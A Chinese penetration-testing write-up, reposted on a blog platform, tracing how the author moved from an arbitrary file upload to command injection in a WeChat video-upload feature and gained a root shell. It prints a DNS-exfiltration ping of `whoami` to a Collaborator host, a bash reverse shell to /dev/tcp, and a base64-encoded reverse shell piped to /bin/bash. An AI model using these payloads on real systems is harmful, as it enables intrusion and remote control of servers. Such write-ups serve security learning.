php生成mp4文件,从文件上传到命令注入

最新推荐文章于 2022-04-14 23:54:02 发布
最新推荐文章于 2022-04-14 23:54:02 发布
阅读量257 收藏
点赞数
文章标签: php生成mp4文件

主站打开是这样的只有扫码登陆

0eb9c046804fee00d0568347acbf6f51.png

尝试扫码提示未注册

查看js,网站用了webpack打包

所有请求都在

12cd0c7cca7aea44abccc8bc239ae142.png

这个js里面

尝试寻找敏感接口无果

百度site:domain.com

6eda2d2dadd4a51e7842225a9e6a4c2c.png

注意到wx1子域,打开这个链接跳转到在微信打开

4cf80b3229f6667763b0072cd4580794.png

那就到微信打开,查看功能点发现一处上传,先上传正常图片

74c108888a5c8793e759c27bacfed272.png

改最下面的filename,后缀不变

b068f9cc40554bf33795a06bd874a04d.png

改上面的filename参数,发现应该是任意文件上传

37b90b4f9e83dcb95d46b639cb1d2683.png

因为在js中发现php的ueditor(访问文件不存在)

f6b5347978312ce546ea583da08df389.png

顾认为是php的站,于是上传php,成功上传

d7ac0c3bff735855cda45eb788493c6e.png

访问此php文件直接被下载回来,没有解析(文件在主站下)

2a34fc486abb0b02e2a050d8aaacc16f.png

此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录

先尝试随便命名一个文件夹,可以创建,访问文件也存在

c54e16bbd3caa1446db2b33a50f95ca8.png

尝试../ ..跨目录失败

798d0a1d9746e8c83412a675564245c6.png

7340baa50c739b5d41973f04be1c401b.png

后面尝试各种姿势还是没能跨目录,也尝试修改上传URI

91e9f7e3d6672588b7f047ca72152d86.png

把Image改为File,显示404

c89eb87529951f3265d0840676ca6258.png

改为upload还是在原来那个目录

9a3b30a984ee3a2e38e6ff42e17b105b.png

于是回头看,微信里的功能

ecc62917e83ba5ba67b438291a504101.png

找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错

108f49ba51f4b85e8718026e83c5caac.png

此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点

e44a75564c2202aaaf2d7f660e6bc87f.png

因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接

| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net |

4ac5778bc354a4059026e9ce022ddc53.png

dnslog收到响应whoami执行结果为root,此时确定存在命令执行

491352c3a49ac9e91feebb85ec738713.png

直接反弹shell,服务器没收到

| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |

bd804b96a5d6809dea2d4b6820e2b474.png

感觉是有特殊字符的原因,于是采用base64编码

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash

监听的端口依然没收到响应

于是采用#注释后面的命令

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #

c106e5449999e1255cea07fc0bf85b1a.png

9a30c84cf781f0f4ee04dcd848883ab0.png

成功反弹shell,发现原来是node.js的站,难怪之前不解析

wx站

906c54fd92a3578c2298c368de2f41fa.png

主站

422e4015876803a272bebe6aa3e93dcc.png

此目录记录当时所做之尝试

80132261cab12340eca27bda542f0b9a.png

其实一开始就应该注意到

80db8443a7908795d4271269bb8f6eac.png

Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了

e7d7c80ddffe7136fc188c0ad23798e0.png

原文:https://www.cnblogs.com/cwkiller/p/12363796.html

朱凤仙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 音频数据流 base64 生成文件 视频
昊喵喵博士
07-19 2991
public function saveFileVideo() { $file = input('post.file'); $file = substr(strstr($file,','),1); $base_img = str_replace('data:image/jpg;base64,', '', $file); // 设置文件路径...
smart_rtmpd 的视频文件注入功能
freeabc的专栏
12-20 1380
软件下载地址:http://www.qiyicc.com/download/rtmpd.rar 一分钟快速搭建 rtmpd 服务器:https://blog.csdn.net/freeabc/article/details/102880984 smart_rtmpd 是一款用于直播,录播性能卓越的服务器。如果您不理解,可以理解为和 nginx-rtmp, srs ,功能类似,但是性能比 n...
Thinkphp 5 Base64 转图片和视频并存储
小西
03-08 937
$this->saveBase64('data:image/png;base64,'.$base64,'image'); $this->saveBase64('data:video/mp4;base64,'.$base64,'video'); /** * * 保存在入口目录erweicode */ public function saveBase64($base64_image_content,$type){ if...
文件上传注入攻击
热门推荐
vergilben的学习日记
04-03 1万+
文件上传注入攻击 系统管理员都有过系统被上传后门、木马或者是网页被人篡改的经历,这类攻击大部分是通过文件上传来是实现的。文件上传漏洞是指网络攻击者上传了一个可执行文件到服务器并执行。这里上传的文件可以是木马、病毒、恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。WebShell就是以asp、php、jsp或者cgi等...
php实现图片上传并利用ImageMagick生成缩略图
10-22
- **安全执行命令**:`shell_exec()`可能引发命令注入攻击,应谨慎使用,确保输入已验证和清理。 - **性能优化**:可以考虑使用PHP的GD库或其他库来生成缩略图,减少对系统资源的依赖,提高性能。 总之,通过结合...
shuiyin.rar_文件上传
09-24
在IT行业中,文件上传是Web应用中常见的功能之一,它允许用户将本地计算机上的文件传输到服务器。在本例中,我们关注的是一个名为"shuiyin.rar"的压缩包,其中包含了一个PHP文件上传类,即"shuiyin.php"。这个类专门...
一个基于PHP Laravel的Web文件管理器.zip
最新发布
05-28
总的来说,这个基于PHP Laravel的Web文件管理器项目利用了Laravel的强大功能,如路由、中间件、服务提供者、依赖注入等,构建了一个允许用户通过Web界面上传、下载、查看、编辑和管理文件的系统。它可能是多用户系统...
php远程文件管理器
08-10
它允许用户通过浏览器访问并管理远程服务器上的文件,包括上传、下载、移动、重命名、删除以及修改文件权限等操作,极大地提高了工作效率。 1. **PHP语言基础** PHP(Hypertext Preprocessor)是一种广泛使用的...
php注入和上传图片验证
weixin_34059951的博客
01-09 207
Mysql注入:SQL Injection with MySQL 作者:angel 发布时间:2005-04-21 来源:4ngel.net 本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advance...
PHP注入文件
10-13
来自阿里云的PHP安全防护 1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
php生成视频预览图支持几乎所有视频
03-07
php生成视频预览图支持几乎所有视频,除了rmvb,其他格式几乎都支持。个人精心收集整理!对有这方面需求的朋非常有用!
mp4插入视频代码
08-07
mp4插入视频代码 无需安装控件!直接加载html
phpmp4:一个简单的轻量级 php 库,用于将视频转换为 HTML5 Mp4 视频格式
07-17
phpmp4 一个简单的轻量级 php 库,用于将视频转换为 HTML5 Mp4 视频格式 ##Requirements 需要最新的 ffmpeg 或 avconv 与 libx264 用法 包括 src\PHPMp4\PHPMp4.php $ video = new \ PHPMp4 \ PHPMp4 ( 'test.wmv' ); try { $ video -> convertVideo (); } catch ( Exception $ e ){ echo 'error ' . $ e -> getMessage (); }
渗透测试-文件上传之获取php信息(一)
lza20001103的博客
04-14 1527
渗透测试之文件上传之获取php信息(一)
php文件转换为mp4,PHP转换视频为MP4并获取预览图的实例分享
weixin_28993311的博客
03-10 2396
如何使用PHP转换视频为MP4并获取预览图?本文呢主要介绍了PHP实现将视频转成MP4并获取视频预览图的方法,涉及php操作视频文件的技巧。希望对大家有所帮助。...
php上传注入教程,php注入祥解_PHP教程
weixin_35355756的博客
03-22 208
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。阅读此文你只要明白下面的这点东西就够了。1.明白php+mysql环境是如何搭建的。2.大概了解php和apache的配置,主要用到php.ini和httpd.conf而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式,即让safe...
php实现本地文件的上传
weixin_47665578的博客
04-13 3347
1.首先创建form表单,设置input的type为file实现文件的上传,代码如下: <form action="" method="POST" enctype="multipart/form-data"> <tr> <td width="150" height="30" align="right" valign="middle">请选择上传文件:</td> <td width="250"&gt...
PHP文件上传教程:表单数据与文件上传
PHP动态网站开发中,文件上传是一项重要的功能,它允许用户将文件从他们的设备上传到服务器。在本任务中,我们将探讨如何实现这一功能,以及涉及的关键知识点。 首先,表单数据的提交是文件上传的基础。在HTML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值